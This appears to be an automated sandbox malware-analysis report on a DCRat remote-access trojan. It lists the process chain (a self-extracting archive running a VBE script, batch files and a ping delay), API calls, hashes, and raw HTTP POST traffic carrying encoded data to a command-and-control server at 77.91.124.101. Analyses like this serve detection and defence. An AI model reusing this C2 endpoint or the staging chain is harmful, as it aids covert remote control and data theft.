Nov 21, 2023 04:48:31.608489990 CET	554	OUT	Data Raw: 52 5f 5d 5a 5b 52 5a 5c 5d 57 55 57 55 5b 57 52 50 5c 58 46 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_]Z[RZ\]WUWU[WRP\XFVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y=^=?;.R= ,["9"<#.R3-R009,+=??,&G''^)3
Nov 21, 2023 04:48:31.811938047 CET	554	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.5	49814	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:32.308875084 CET	555	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:32.505321980 CET	555	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:32.505526066 CET	558	OUT	Data Raw: 57 59 5d 5e 5b 5b 5f 59 5d 57 55 57 55 5f 57 51 50 5e 58 48 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]^[[_Y]WUWU_WQP^XHVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\';)_?+R)3,-79>+ W$%$#&R-<8>&G''^)#
Nov 21, 2023 04:48:32.706655025 CET	558	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	77.91.124.101	80	192.168.2.5	49814	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:32.308875084 CET	555	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:32.505321980 CET	555	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:32.505526066 CET	558	OUT	Data Raw: 57 59 5d 5e 5b 5b 5f 59 5d 57 55 57 55 5f 57 51 50 5e 58 48 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY]^[[_Y]WUWU_WQP^XHVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\';)_?+R)3,-79>+ W$%$#&R-<8>&G''^)#
Nov 21, 2023 04:48:32.706655025 CET	558	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Target ID:	0
Start time:	04:46:51
Start date:	21/11/2023
Path:	C:\Users\user\Desktop\o9jDrpZrgR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\o9jDrpZrgR.exe
Imagebase:	0x880000
File size:	1'622'827 bytes
MD5 hash:	C256204DEB01C77E21BA17B5E2411245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:46:51
Start date:	21/11/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
Imagebase:	0xfc0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:47:09
Start date:	21/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:47:09
Start date:	21/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:47:09
Start date:	21/11/2023
Path:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
Wow64 process (32bit):	false
Commandline:	C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
Imagebase:	0xfc0000
File size:	1'300'992 bytes
MD5 hash:	295BF8D9B734730EFA567C8DA9918FE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:47:11
Start date:	21/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
Imagebase:	0x7ff695380000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:47:12
Start date:	21/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:47:12
Start date:	21/11/2023
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6c1e40000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:47:12
Start date:	21/11/2023
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff73a210000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:47:21
Start date:	21/11/2023
Path:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
Imagebase:	0x720000
File size:	1'300'992 bytes
MD5 hash:	295BF8D9B734730EFA567C8DA9918FE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs Detection: 69%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	1525
Total number of Limit Nodes:	41

Executed Functions

Function 0089DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00890863: GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF

Part of subcall function 0089A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0089A655

Part of subcall function 0089AC16: OleInitialize.OLE32(00000000), ref: 0089AC2F
Part of subcall function 0089AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
Part of subcall function 0089AC16: SHGetMalloc.SHELL32(008C8438), ref: 0089AC70

GetCommandLineW.KERNEL32 ref: 0089DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0089DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0089DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0089DFCE

Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30

CloseHandle.KERNEL32(00000000), ref: 0089DFD7
GetModuleFileNameW.KERNEL32(00000000,008DEC90,00000800), ref: 0089DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,008DEC90), ref: 0089DFFE
GetLocalTime.KERNEL32(?), ref: 0089E009
_swprintf.LIBCMT ref: 0089E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0089E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0089E061
LoadIconW.USER32(00000000,00000064), ref: 0089E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0089E0C9
Sleep.KERNEL32(?), ref: 0089E0F7
DeleteObject.GDI32 ref: 0089E130
DeleteObject.GDI32(?), ref: 0089E140
CloseHandle.KERNEL32 ref: 0089E183

Strings

sfxstime, xrefs: 0089E055
winrarsfxmappingfile.tmp, xrefs: 0089DF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0089E039
C:\Users\user\Desktop, xrefs: 0089DF33
STARTDLG, xrefs: 0089E0BE
sfxname, xrefs: 0089DFF9

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-2656992072
Opcode ID: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
Instruction ID: 44d4c0a6381a4afd5a59caec010e93da58520958788f4b91c3d948e9d9d8c405
Opcode Fuzzy Hash: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
Instruction Fuzzy Hash: C5610671504745AFDB20BBB8EC49F6B3BACFB44711F08052AF945D2292EB789904C762

Uniqueness

Uniqueness Score: -1.00%

Function 0089A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6

Part of subcall function 0089A626: GdipAlloc.GDIPLUS(00000010), ref: 0089A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
GlobalFree.KERNEL32(00000000), ref: 0089A7CD

Strings

PNG, xrefs: 0089A6C6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
Instruction ID: 568186c7fccadaf1b7930cd158bd8a01e3fdeb46eda0802ea53ce43866c45507
Opcode Fuzzy Hash: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
Instruction Fuzzy Hash: A6319C75600702BFDB14AF65EC89D2BBBBDFF85760B080619F845D2621EB31DC408AA2

Uniqueness

Uniqueness Score: -1.00%

Function 0088A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4

Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A728
GetLastError.KERNEL32(?,?,?,?,0088A592,000000FF,?,?), ref: 0088A734

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
Instruction ID: 3cdf8b29f4bf99d26ce535fcac8df4cd889aac129fc2fe301692e8a8366f119c
Opcode Fuzzy Hash: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
Instruction Fuzzy Hash: 7C418F72900519ABCB29FF68CC88AE9B7B8FF48350F144296E559E3240D7346E91DF91

Uniqueness

Uniqueness Score: -1.00%

Function 008A7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E0F
TerminateProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E16
ExitProcess.KERNEL32 ref: 008A7E28

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
Instruction ID: 3875ad817cac5afd538b9037a6ac41fd74b1f54dab3aa67457dc953bd43935ac
Opcode Fuzzy Hash: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
Instruction Fuzzy Hash: DEE04632004948ABDF017F28CD09A4A3F6AFF21741B004554F819DA532CB36EEA2DA80

Uniqueness

Uniqueness Score: -1.00%

Function 0088848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00888493

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
Instruction ID: bead4d911f554bf546afba8befc9c40e74b9f0f5dd5dd7299dd09d78fb874354
Opcode Fuzzy Hash: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
Instruction Fuzzy Hash: 2282E970904245EEDF25EF64C895BFABBB9FF05300F4841B9E949DB182DB315A88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0089B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0089B7E5

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B8EF
IsDialogMessageW.USER32(?,?), ref: 0089B902
TranslateMessage.USER32(?), ref: 0089B910
DispatchMessageW.USER32(?), ref: 0089B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0089B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0089B960
GetDlgItem.USER32(?,00000068), ref: 0089B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089B99E
SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089B9B1

Part of subcall function 0089D453: _wcslen.LIBCMT ref: 0089D47D

SetFocus.USER32(00000000), ref: 0089B9B8
_swprintf.LIBCMT ref: 0089BA24

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

Part of subcall function 0089D4D4: GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
Part of subcall function 0089D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0089BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0089BA90
GetTickCount.KERNEL32 ref: 0089BAAE
_swprintf.LIBCMT ref: 0089BAC2
GetLastError.KERNEL32(?,00000011), ref: 0089BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0089BB43
_swprintf.LIBCMT ref: 0089BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0089BBD0
GetCommandLineW.KERNEL32 ref: 0089BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0089BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0089BC6F
Sleep.KERNEL32(00000064), ref: 0089BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0089BCE2
CloseHandle.KERNEL32(00000000), ref: 0089BCEB
_swprintf.LIBCMT ref: 0089BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BD7D
SetDlgItemTextW.USER32(?,00000065,008B35F4), ref: 0089BD94
GetDlgItem.USER32(?,00000065), ref: 0089BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0089BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0089BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BE68
_wcslen.LIBCMT ref: 0089BEBE
_swprintf.LIBCMT ref: 0089BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0089BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0089BF4C
GetDlgItem.USER32(?,00000068), ref: 0089BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0089BF6B
GetDlgItem.USER32(?,00000066), ref: 0089BF85
SetWindowTextW.USER32(00000000,008CA472), ref: 0089BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0089C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0089C0BD
EnableWindow.USER32(00000000,00000000), ref: 0089C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0089C1D9

Part of subcall function 0089C73F: __EH_prolog.LIBCMT ref: 0089C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C1FD

Strings

<, xrefs: 0089BB84
"%s"%s, xrefs: 0089BD0D
winrarsfxmappingfile.tmp, xrefs: 0089BBA6
C:\Users\user\Desktop, xrefs: 0089BBC9
__tmp_rar_sfx_access_check_%u, xrefs: 0089BAB5
STARTDLG, xrefs: 0089B801
@, xrefs: 0089BB91
%s, xrefs: 0089BED8
-el -s2 "-d%s" "-sp%s", xrefs: 0089BB6B
LICENSEDLG, xrefs: 0089C0B2

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
